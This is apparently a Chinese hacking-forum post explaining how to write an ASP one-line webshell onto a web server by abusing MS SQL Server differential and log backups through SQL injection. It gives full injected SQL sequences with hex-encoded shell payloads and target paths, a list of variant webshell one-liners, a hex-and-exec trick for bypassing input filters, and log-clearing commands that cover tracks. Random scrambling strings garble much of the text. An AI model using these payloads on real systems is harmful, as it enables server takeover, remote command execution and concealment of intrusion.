MSsql差异备份总结

admin

差异备份的流程大概这样：
' ]( o7 H( N+ Y2 B3 ^( b1.完整备份一次(保存位置当然可以改)
3 D2 F2 ~1 ?! g. F- D- i0 cbackup database 库名 to disk = 'c:\ddd.bak';--
7 f; v2 \* i# c- u
* s  @3 i8 Y7 \5 E- d: N; S2.创建表并插曲入数据
. P4 x  \$ ]" A! L* bcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
. {- L4 d9 f$ Z. O( v/ W$ Y, h
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
3 t* i; o% o$ F/ s
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

# W) n6 S5 A6 b/ C如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
1 _- \- t/ ^# X. R3 m2 I; M步骤:
" @; D9 y* P; ]
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

) P( T$ y5 R3 A# F! k/ ~create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

( {# V* I8 x# A  n
2 o* `$ ]( S3 ~/ \* N# q, a7 oinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
" M% p! T% P9 t, r8 L  f' m- b
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
) U" c9 @# Z( C
drop table [xiaolu]  -- 删除此表。
/ R% v" ~' `% g/ _& g3 r
9 A+ ]" E0 p* i5 f2 ?0x77006F006B0061006F002E00620061006B00为wokao.bak
- s( D: I7 S! f% S; m0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
8 M' T: {: ~! K( s% B3 [9 R
5 ^9 P% X# l2 f: J2 e声明：方法不是我想的，我只是写工具，默认得到shell是
3 Z. L+ k* T" X( l! o: P' c( B! W<%execute(request("a"))%>
, h( B, v9 |+ G/ x! j) j+ \6 u===============================================================
8 f' [2 A3 p0 z4 H
我发现上面代码，有时会无效，而直接用

/ r% N  h$ }  s0 O; A  h  dbackup database 库名 to disk = 'c:\ddd.bak'

% h  @8 i7 U8 f- q; S/ R9 dcreate table [dbo].[dtest] ([cmd] [image]);
; V' o% X  z2 ?' o, M
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
- ^1 t4 j$ m4 t: s5 S3 y' e! Z
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
1 \6 n6 C7 A1 {& X4 L/ ~5 D: g
. O/ X. s( e# R" y4 P  i+ m却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
& r9 F( A% Y7 u% P0 v3 V
9 o4 k% w- I7 k  k. E库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
  z8 i  Y. O/ s! a
网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:

, q( Y5 J) K% }9 x';alter database null set RECOVERY FULL--
7 p: B( o/ d5 w' f. K0 g' \
';create table cmd (a image)--
6 l8 U: K0 \( ^# o5 G' g8 N
';backup log null to disk = 'f:\cmd' with init--
8 R: r( z2 V/ o: l% v
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--
9 z7 F6 x& a( X8 J2 p
';drop table cmd--

1 W- g% P( K+ M0 I4 {. l* q0 Q+ u9 a5 t';alter database XXX set RECOVERY SIMPLE--
$ n! ?8 ~" A' W, w
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

1 U9 X7 p3 |+ P8 |说到一句话马，还可以有这么几种写法：
# n( h  r( b3 L. u7 \* }
0 f1 P7 v8 d) P9 s: j3 _3 ?: Q8 Qa)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
% m" O) i6 g; O) \c)%><%execute request("a")%><%
/ N; l9 b. E) I& [( Md)<script language=VBScript runat=server>execute request("a")</script>
4 f4 e. r" P+ C4 v3 o& ?e)<%25Execute(request("a"))%25>
1 P7 ]& x7 k" I+ \  x0 hf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
: c. t6 K- u- K# R  G) R- Zg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
3 _, k+ x5 ?8 I. O" fJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
* ]8 _7 ]0 G" h6 r1 ~. G2 \
' P1 N: f+ {1 e8 ~=============================================
! P- j/ S  V! `6 ?1 [9 K
当遇到差备过滤了/时用这个语句代替

8 d% ^, Q. r5 u0 [7 k3 F% Ndeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

$ C8 W" E; \2 X把要执行的语句转16进制然后用exec执行
1 _" |* V) g7 v1 m
/ V$ N/ N) }4 r6 v$ x. g! l+ a
# a' L& s& {- N9 i  j9 X减少备份文件大小方法如下:
% _+ X; O& u- d* d# W
$ Y% ^9 O$ L2 p总的来说就是那么简单几句,下面以备份数据库model为例子
" Q3 x$ ], h9 H3 n. T6 e( t/ `4 ]: z0 Z1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
' R4 ?' r: M% }. K1 |4 z+ A
3 p( d/ D$ x; N# e7 E4 n2 i
. G  V+ f2 k7 L7 @8 c' \
SQL语句清理日志
0 j/ g; D1 k( \! p/ J, L# n$ o注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG
5 y0 D- p9 ~' O! l6 b
--截断事务日志
BACKUP LOG test WITH NO_LOG

--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
7 r0 N0 A2 ?( S3 L+ R* O7 R1 YSelect * from sysfiles DBCC SHRINKFILE(1)
! \3 K7 O% _$ ?1 R; S
+ G0 s+ e  e& y, \& {--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'